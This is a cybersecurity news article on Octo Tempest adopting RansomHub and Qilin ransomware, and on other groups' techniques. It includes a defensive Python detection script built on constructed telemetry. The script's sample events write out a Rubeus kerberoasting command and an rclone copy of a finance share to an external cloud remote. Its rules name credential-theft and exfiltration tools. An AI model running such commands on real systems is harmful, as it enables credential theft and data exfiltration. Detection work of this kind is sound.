Wednesday, November 13, 2024

Octo Tempest, Known for Attacking VMware ESXi Servers, Adds RansomHub and Qilin to Its Arsenal


Threat actors frequently target VMware ESXi servers because a single hypervisor hosts many virtual machines, so one compromised host gives access to many systems at once.

Encrypting or shutting down an ESXi host takes every guest it runs offline, and the virtual disks stored on it hold a large share of an organization's data, which makes these servers a lucrative target for ransomware operators.

Microsoft Threat Intelligence researchers recently reported that Octo Tempest, a group known for attacking VMware ESXi servers, has added the RansomHub and Qilin payloads to its arsenal.


Octo Tempest & New Tools

In early to mid-2024, Octo Tempest expanded its operations. The group, which Microsoft Threat Intelligence tracks closely, began deploying two additional ransomware payloads, RansomHub and Qilin.


Octo Tempest is known for several dangerous techniques: social engineering to trick employees into handing over credentials, identity compromise, long-term persistence inside compromised environments, attacks on VMware ESXi servers, and, until now, the BlackCat (ALPHV) ransomware as its payload of choice.

Octo Tempest is responsible for many of the intrusions researchers have investigated and helped remediate. Its adoption of RansomHub and Qilin makes it an even greater threat than before.

RansomHub, a rapidly growing ransomware-as-a-service (RaaS) payload, is becoming one of the most widespread ransomware families.

It is being adopted by a range of threat actors, including groups that previously used other payloads such as BlackCat.

Manatee Tempest, for example, deployed RansomHub after Mustard Tempest obtained initial access through FakeUpdates (also known as SocGholish).

Other active ransomware families include:

  • Qilin
  • BlackSuit
  • LockBit
  • Medusa
  • Black Basta
  • Play

Besides this, a new ransomware, Fog, emerged this quarter, and was used by Storm-0844, which previously favored Akira. 

Storm-0844 gains initial access through VPN clients, using accounts whose credentials have likely been compromised.

Once inside, the group relies on open-source tools: AdFind for Active Directory reconnaissance, Rubeus for Kerberos abuse, and Advanced IP Scanner for network discovery and lateral movement, and it stages data for exfiltration with rclone.

A new ransomware called FakePenny is attributed to the North Korean group Moonstone Sleet. The same actor has also used a malicious tank game as a lure to deliver its malware.

Both Octo Tempest and Storm-0501 concentrate on identity compromise. Storm-0501 has used the open-source AADInternals toolkit to set up a federated domain in the victim's tenant, a backdoor that lets the attacker sign in as any user, before deploying Embargo ransomware.

The variety of tactics and tools across these groups shows how much more sophisticated the ransomware ecosystem has become.

Ransomware actors also abuse legitimate remote management tools. Storm-1811, for instance, poses as IT support to get victims to start a Quick Assist session, then uses that remote access to stage Black Basta attacks.
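The tradecraft described above (the Storm-0844 toolchain of AdFind, Rubeus, Advanced IP Scanner and rclone, the AADInternals federation backdoor used by Storm-0501, and the Quick Assist sessions abused by Storm-1811) all leaves traces in ordinary telemetry. The following Python pass is an added example, not code from the article or from Microsoft: it runs a handful of detection rules over constructed Sysmon-style process-creation events and Entra ID audit entries and escalates hosts where more than one stage of the chain fired. The events, host names, and thresholds are constructed for illustration, and the Entra audit activity names are an assumption to verify against your own tenant's logs.

```python
import json
import re

# Constructed sample telemetry (not real data). "process" events mimic the fields
# of Sysmon Event ID 1; "identity" events mimic Entra ID audit log entries.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-014", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\af.exe",
     "cmdline": 'af.exe -f "(objectcategory=person)" -json > users.txt'},
    {"type": "process", "host": "WS-014", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\r.exe",
     "cmdline": "r.exe kerberoast /outfile:hashes.txt"},
    {"type": "process", "host": "WS-014", "user": "CORP\\jdoe",
     "image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe",
     "cmdline": "advanced_ip_scanner.exe"},
    {"type": "process", "host": "FS-02", "user": "CORP\\svc_backup",
     "image": "C:\\ProgramData\\rclone\\rclone.exe",
     "cmdline": "rclone.exe copy \\\\FS-02\\Finance mega:finance -q --transfers 16"},
    {"type": "process", "host": "WS-021", "user": "CORP\\asmith",
     "image": "C:\\Program Files\\WindowsApps\\QuickAssist_x64\\QuickAssist.exe",
     "cmdline": "QuickAssist.exe"},
    {"type": "process", "host": "WS-021", "user": "CORP\\asmith",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"type": "identity", "operation": "Set domain authentication",
     "initiated_by": "adm.breakglass@contoso.com", "target": "contoso.com",
     "new_value": "Federated"},
    {"type": "identity", "operation": "Update user",
     "initiated_by": "hr.app@contoso.com", "target": "jdoe@contoso.com",
     "new_value": "Department=Finance"},
]

# (rule name, severity, regex applied to "<image basename> <command line>").
# The rules key on arguments rather than file names wherever possible, because
# AdFind and Rubeus are routinely renamed before use.
PROCESS_RULES = [
    ("adfind_ad_recon", "medium", r'(?i)-f\s+"?\(?objectcategory='),
    ("rubeus_kerberos_abuse", "high",
     r"(?i)\b(kerberoast|asreproast|asktgt|ptt|s4u|tgtdeleg)\b"),
    ("advanced_ip_scanner", "low", r"(?i)advanced_ip_scanner\.exe"),
    # rclone copy/sync/move with a "<remote>:<path>" argument, i.e. data leaving the host.
    ("rclone_exfil", "high", r"(?i)\brclone(\.exe)?\s+(copy|sync|move)\b.*\s[a-z0-9_-]{2,}:\S*"),
    # Legitimate on its own; informational so it can be correlated with a help-desk call.
    ("quick_assist_session", "info", r"(?i)^quickassist\.exe"),
]

# Entra ID audit activities that change how a domain authenticates. A federation
# the tenant owner did not configure is the AADInternals backdoor pattern: the
# attacker's signing certificate can then mint tokens for any user.
# Assumed activity names; confirm against the audit log of a real tenant.
FEDERATION_OPERATIONS = {"Set domain authentication", "Set federation settings on domain"}


def triage(events):
    """Return one finding per rule hit, each tagged with the host or domain affected."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            basename = ev["image"].rsplit("\\", 1)[-1]
            haystack = f"{basename} {ev['cmdline']}"
            for name, severity, pattern in PROCESS_RULES:
                if re.search(pattern, haystack):
                    findings.append({"rule": name, "severity": severity,
                                     "host": ev["host"], "user": ev["user"]})
        elif ev["type"] == "identity" and ev["operation"] in FEDERATION_OPERATIONS:
            findings.append({"rule": "domain_federation_change", "severity": "critical",
                             "host": ev["target"], "user": ev["initiated_by"]})
    return findings


def escalate(findings, min_distinct_rules=2):
    """Hosts where two or more distinct rules fired. One tool can be an admin at work;
    AD recon followed by Kerberos abuse or an rclone upload is the chain described above."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    print(json.dumps(hits, indent=2))
    print("escalate:", escalate(hits))
```

On the constructed sample, the pass flags AdFind, Rubeus and Advanced IP Scanner on WS-014, the rclone upload on FS-02, the Quick Assist session on WS-021, and the federation change on contoso.com, and escalates only WS-014, where three distinct stages fired. In production the same rules would sit in a SIEM query over real process and audit telemetry, with the federation rule paired with an allow-list of the domains the tenant actually federates.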

To counter this growing threat, organizations should adhere to security best practices: credential hygiene, least privilege, and a Zero Trust approach to access.


Kaaviya
Kaaviya is a Security Editor and reporter with Cyber Security News. She covers cybersecurity incidents across cyberspace.
